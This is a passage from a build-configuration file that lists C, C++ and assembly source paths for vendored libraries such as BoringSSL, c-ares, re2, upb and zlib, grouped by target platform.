'third_party/boringssl-with-bazel/err_data.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_bitstr.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_bool.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_d2i_fp.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_dup.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_enum.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_gentm.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_i2d_fp.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_int.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_mbstr.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_object.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_octet.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_print.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_strex.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_strnid.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_time.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_type.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_utctm.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_utf8.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn1_lib.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn1_par.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn_pack.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/f_int.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/f_string.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_dec.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_enc.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_fre.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_new.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_typ.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_utl.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/time_support.c',
'third_party/boringssl-with-bazel/src/crypto/base64/base64.c',
'third_party/boringssl-with-bazel/src/crypto/bio/bio.c',
'third_party/boringssl-with-bazel/src/crypto/bio/bio_mem.c',
'third_party/boringssl-with-bazel/src/crypto/bio/connect.c',
'third_party/boringssl-with-bazel/src/crypto/bio/fd.c',
'third_party/boringssl-with-bazel/src/crypto/bio/file.c',
'third_party/boringssl-with-bazel/src/crypto/bio/hexdump.c',
'third_party/boringssl-with-bazel/src/crypto/bio/pair.c',
'third_party/boringssl-with-bazel/src/crypto/bio/printf.c',
'third_party/boringssl-with-bazel/src/crypto/bio/socket.c',
'third_party/boringssl-with-bazel/src/crypto/bio/socket_helper.c',
'third_party/boringssl-with-bazel/src/crypto/blake2/blake2.c',
'third_party/boringssl-with-bazel/src/crypto/bn_extra/bn_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/bn_extra/convert.c',
'third_party/boringssl-with-bazel/src/crypto/buf/buf.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/asn1_compat.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/ber.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/cbb.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/cbs.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/unicode.c',
'third_party/boringssl-with-bazel/src/crypto/chacha/chacha.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/cipher_extra.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/derive_key.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesccm.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesctrhmac.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesgcmsiv.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_chacha20poly1305.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_null.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_rc2.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_rc4.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_tls.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/tls_cbc.c',
'third_party/boringssl-with-bazel/src/crypto/cmac/cmac.c',
'third_party/boringssl-with-bazel/src/crypto/conf/conf.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-fuchsia.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-linux.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-win.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-arm-linux.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-arm.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-intel.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-ppc64le.c',
'third_party/boringssl-with-bazel/src/crypto/crypto.c',
'third_party/boringssl-with-bazel/src/crypto/curve25519/curve25519.c',
'third_party/boringssl-with-bazel/src/crypto/curve25519/spake25519.c',
'third_party/boringssl-with-bazel/src/crypto/dh_extra/dh_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/dh_extra/params.c',
'third_party/boringssl-with-bazel/src/crypto/digest_extra/digest_extra.c',
'third_party/boringssl-with-bazel/src/crypto/dsa/dsa.c',
'third_party/boringssl-with-bazel/src/crypto/dsa/dsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/ec_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/ec_derive.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/hash_to_curve.c',
'third_party/boringssl-with-bazel/src/crypto/ecdh_extra/ecdh_extra.c',
'third_party/boringssl-with-bazel/src/crypto/ecdsa_extra/ecdsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/engine/engine.c',
'third_party/boringssl-with-bazel/src/crypto/err/err.c',
'third_party/boringssl-with-bazel/src/crypto/evp/digestsign.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp_ctx.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_dsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ec.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ec_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ed25519.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ed25519_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_rsa.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_rsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_x25519.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_x25519_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/pbkdf.c',
'third_party/boringssl-with-bazel/src/crypto/evp/print.c',
'third_party/boringssl-with-bazel/src/crypto/evp/scrypt.c',
'third_party/boringssl-with-bazel/src/crypto/evp/sign.c',
'third_party/boringssl-with-bazel/src/crypto/ex_data.c',
'third_party/boringssl-with-bazel/src/crypto/fipsmodule/bcm.c',
'third_party/boringssl-with-bazel/src/crypto/fipsmodule/fips_shared_support.c',
'third_party/boringssl-with-bazel/src/crypto/hkdf/hkdf.c',
'third_party/boringssl-with-bazel/src/crypto/hpke/hpke.c',
'third_party/boringssl-with-bazel/src/crypto/hrss/hrss.c',
'third_party/boringssl-with-bazel/src/crypto/lhash/lhash.c',
'third_party/boringssl-with-bazel/src/crypto/mem.c',
'third_party/boringssl-with-bazel/src/crypto/obj/obj.c',
'third_party/boringssl-with-bazel/src/crypto/obj/obj_xref.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_all.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_info.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_lib.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_oth.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_pk8.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_pkey.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_x509.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_xaux.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs7/pkcs7.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs7/pkcs7_x509.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/p5_pbev2.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/pkcs8.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/pkcs8_x509.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_arm.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_vec.c',
'third_party/boringssl-with-bazel/src/crypto/pool/pool.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/deterministic.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/forkunsafe.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/fuchsia.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/passive.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/rand_extra.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/windows.c',
'third_party/boringssl-with-bazel/src/crypto/rc4/rc4.c',
'third_party/boringssl-with-bazel/src/crypto/refcount_c11.c',
'third_party/boringssl-with-bazel/src/crypto/refcount_lock.c',
'third_party/boringssl-with-bazel/src/crypto/rsa_extra/rsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/rsa_extra/rsa_print.c',
'third_party/boringssl-with-bazel/src/crypto/siphash/siphash.c',
'third_party/boringssl-with-bazel/src/crypto/stack/stack.c',
'third_party/boringssl-with-bazel/src/crypto/thread.c',
'third_party/boringssl-with-bazel/src/crypto/thread_none.c',
'third_party/boringssl-with-bazel/src/crypto/thread_pthread.c',
'third_party/boringssl-with-bazel/src/crypto/thread_win.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/pmbtoken.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/trust_token.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/voprf.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_digest.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_sign.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_verify.c',
'third_party/boringssl-with-bazel/src/crypto/x509/algorithm.c',
'third_party/boringssl-with-bazel/src/crypto/x509/asn1_gen.c',
'third_party/boringssl-with-bazel/src/crypto/x509/by_dir.c',
'third_party/boringssl-with-bazel/src/crypto/x509/by_file.c',
'third_party/boringssl-with-bazel/src/crypto/x509/i2d_pr.c',
'third_party/boringssl-with-bazel/src/crypto/x509/name_print.c',
'third_party/boringssl-with-bazel/src/crypto/x509/rsa_pss.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_crl.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_x509a.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_att.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_cmp.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_d2.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_def.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_ext.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_lu.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_obj.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_set.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_trs.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_txt.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_v3.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_vfy.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_vpm.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509cset.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509name.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509rset.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509spki.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_algor.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_all.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_attrib.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_crl.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_exten.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_info.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_name.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_pkey.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_pubkey.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_sig.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_spki.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_val.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_x509a.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_cache.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_data.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_lib.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_map.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_node.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_tree.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_akey.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_akeya.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_alt.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_bcons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_bitst.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_conf.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_cpols.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_crld.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_enum.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_extku.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_genn.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ia5.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_info.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_int.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_lib.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ncons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ocsp.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pci.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pcia.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pcons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pmaps.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_prn.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_purp.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_skey.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_utl.c',
'third_party/boringssl-with-bazel/src/ssl/bio_ssl.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_both.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_pkt.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_srtp.cc',
'third_party/boringssl-with-bazel/src/ssl/dtls_method.cc',
'third_party/boringssl-with-bazel/src/ssl/dtls_record.cc',
'third_party/boringssl-with-bazel/src/ssl/encrypted_client_hello.cc',
'third_party/boringssl-with-bazel/src/ssl/extensions.cc',
'third_party/boringssl-with-bazel/src/ssl/handoff.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake_client.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake_server.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_both.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_pkt.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_aead_ctx.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_asn1.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_buffer.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_cert.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_cipher.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_file.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_key_share.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_privkey.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_session.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_stat.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_transcript.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_versions.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_x509.cc',
'third_party/boringssl-with-bazel/src/ssl/t1_enc.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_both.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_client.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_enc.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_server.cc',
'third_party/boringssl-with-bazel/src/ssl/tls_method.cc',
'third_party/boringssl-with-bazel/src/ssl/tls_record.cc',
'third_party/cares/cares/src/lib/ares__close_sockets.c',
'third_party/cares/cares/src/lib/ares__get_hostent.c',
'third_party/cares/cares/src/lib/ares__parse_into_addrinfo.c',
'third_party/cares/cares/src/lib/ares__read_line.c',
'third_party/cares/cares/src/lib/ares__readaddrinfo.c',
'third_party/cares/cares/src/lib/ares__sortaddrinfo.c',
'third_party/cares/cares/src/lib/ares__timeval.c',
'third_party/cares/cares/src/lib/ares_android.c',
'third_party/cares/cares/src/lib/ares_cancel.c',
'third_party/cares/cares/src/lib/ares_create_query.c',
'third_party/cares/cares/src/lib/ares_data.c',
'third_party/cares/cares/src/lib/ares_destroy.c',
'third_party/cares/cares/src/lib/ares_expand_name.c',
'third_party/cares/cares/src/lib/ares_expand_string.c',
'third_party/cares/cares/src/lib/ares_fds.c',
'third_party/cares/cares/src/lib/ares_free_hostent.c',
'third_party/cares/cares/src/lib/ares_free_string.c',
'third_party/cares/cares/src/lib/ares_freeaddrinfo.c',
'third_party/cares/cares/src/lib/ares_getaddrinfo.c',
'third_party/cares/cares/src/lib/ares_getenv.c',
'third_party/cares/cares/src/lib/ares_gethostbyaddr.c',
'third_party/cares/cares/src/lib/ares_gethostbyname.c',
'third_party/cares/cares/src/lib/ares_getnameinfo.c',
'third_party/cares/cares/src/lib/ares_getsock.c',
'third_party/cares/cares/src/lib/ares_init.c',
'third_party/cares/cares/src/lib/ares_library_init.c',
'third_party/cares/cares/src/lib/ares_llist.c',
'third_party/cares/cares/src/lib/ares_mkquery.c',
'third_party/cares/cares/src/lib/ares_nowarn.c',
'third_party/cares/cares/src/lib/ares_options.c',
'third_party/cares/cares/src/lib/ares_parse_a_reply.c',
'third_party/cares/cares/src/lib/ares_parse_aaaa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_caa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_mx_reply.c',
'third_party/cares/cares/src/lib/ares_parse_naptr_reply.c',
'third_party/cares/cares/src/lib/ares_parse_ns_reply.c',
'third_party/cares/cares/src/lib/ares_parse_ptr_reply.c',
'third_party/cares/cares/src/lib/ares_parse_soa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_srv_reply.c',
'third_party/cares/cares/src/lib/ares_parse_txt_reply.c',
'third_party/cares/cares/src/lib/ares_platform.c',
'third_party/cares/cares/src/lib/ares_process.c',
'third_party/cares/cares/src/lib/ares_query.c',
'third_party/cares/cares/src/lib/ares_search.c',
'third_party/cares/cares/src/lib/ares_send.c',
'third_party/cares/cares/src/lib/ares_strcasecmp.c',
'third_party/cares/cares/src/lib/ares_strdup.c',
'third_party/cares/cares/src/lib/ares_strerror.c',
'third_party/cares/cares/src/lib/ares_strsplit.c',
'third_party/cares/cares/src/lib/ares_timeout.c',
'third_party/cares/cares/src/lib/ares_version.c',
'third_party/cares/cares/src/lib/ares_writev.c',
'third_party/cares/cares/src/lib/bitncmp.c',
'third_party/cares/cares/src/lib/inet_net_pton.c',
'third_party/cares/cares/src/lib/inet_ntop.c',
'third_party/cares/cares/src/lib/windows_port.c',
'third_party/re2/re2/bitstate.cc',
'third_party/re2/re2/compile.cc',
'third_party/re2/re2/dfa.cc',
'third_party/re2/re2/filtered_re2.cc',
'third_party/re2/re2/mimics_pcre.cc',
'third_party/re2/re2/nfa.cc',
'third_party/re2/re2/onepass.cc',
'third_party/re2/re2/parse.cc',
'third_party/re2/re2/perl_groups.cc',
'third_party/re2/re2/prefilter.cc',
'third_party/re2/re2/prefilter_tree.cc',
'third_party/re2/re2/prog.cc',
'third_party/re2/re2/re2.cc',
'third_party/re2/re2/regexp.cc',
'third_party/re2/re2/set.cc',
'third_party/re2/re2/simplify.cc',
'third_party/re2/re2/stringpiece.cc',
'third_party/re2/re2/tostring.cc',
'third_party/re2/re2/unicode_casefold.cc',
'third_party/re2/re2/unicode_groups.cc',
'third_party/re2/util/pcre.cc',
'third_party/re2/util/rune.cc',
'third_party/re2/util/strutil.cc',
'third_party/upb/upb/decode.c',
'third_party/upb/upb/decode_fast.c',
'third_party/upb/upb/def.c',
'third_party/upb/upb/encode.c',
'third_party/upb/upb/msg.c',
'third_party/upb/upb/reflection.c',
'third_party/upb/upb/table.c',
'third_party/upb/upb/text_encode.c',
'third_party/upb/upb/upb.c',
'third_party/zlib/adler32.c',
'third_party/zlib/compress.c',
'third_party/zlib/crc32.c',
'third_party/zlib/deflate.c',
'third_party/zlib/gzclose.c',
'third_party/zlib/gzlib.c',
'third_party/zlib/gzread.c',
'third_party/zlib/gzwrite.c',
'third_party/zlib/infback.c',
'third_party/zlib/inffast.c',
'third_party/zlib/inflate.c',
'third_party/zlib/inftrees.c',
'third_party/zlib/trees.c',
'third_party/zlib/uncompr.c',
'third_party/zlib/zutil.c',
]
ASM_SOURCE_FILES = {
'crypto_ios_aarch64': [
'third_party/boringssl-with-bazel/ios-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_ios_arm': [
'third_party/boringssl-with-bazel/ios-arm/crypto/chacha/chacha-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/aesv8-armx32.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/armv4-mont.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/bsaes-armv7.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/ghash-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/ghashv8-armx32.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha1-armv4-large.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha256-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha512-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/vpaes-armv7.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/test/trampoline-armv4.S',
],
'crypto_linux_aarch64': [
'third_party/boringssl-with-bazel/linux-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_linux_arm': [
'third_party/boringssl-with-bazel/linux-arm/crypto/chacha/chacha-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/aesv8-armx32.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/armv4-mont.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/bsaes-armv7.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/ghash-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/ghashv8-armx32.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha1-armv4-large.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha256-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha512-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/vpaes-armv7.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/test/trampoline-armv4.S',
'third_party/boringssl-with-bazel/src/crypto/curve25519/asm/x25519-asm-arm.S',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_arm_asm.S',
],
'crypto_linux_ppc64le': [
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/fipsmodule/aesp8-ppc.S',
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/fipsmodule/ghashp8-ppc.S',
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/test/trampoline-ppc.S',
],
'crypto_linux_x86': [
'third_party/boringssl-with-bazel/linux-x86/crypto/chacha/chacha-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/aesni-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/bn-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/co-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/ghash-ssse3-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/ghash-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/md5-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha1-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha256-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha512-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/vpaes-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/x86-mont.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/test/trampoline-x86.S',
],
'crypto_linux_x86_64': [
'third_party/boringssl-with-bazel/linux-x86_64/crypto/chacha/chacha-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/aesni-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/ghash-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/md5-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/p256-x86_64-asm.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/rdrand-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/rsaz-avx2.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha1-x86_64.S',
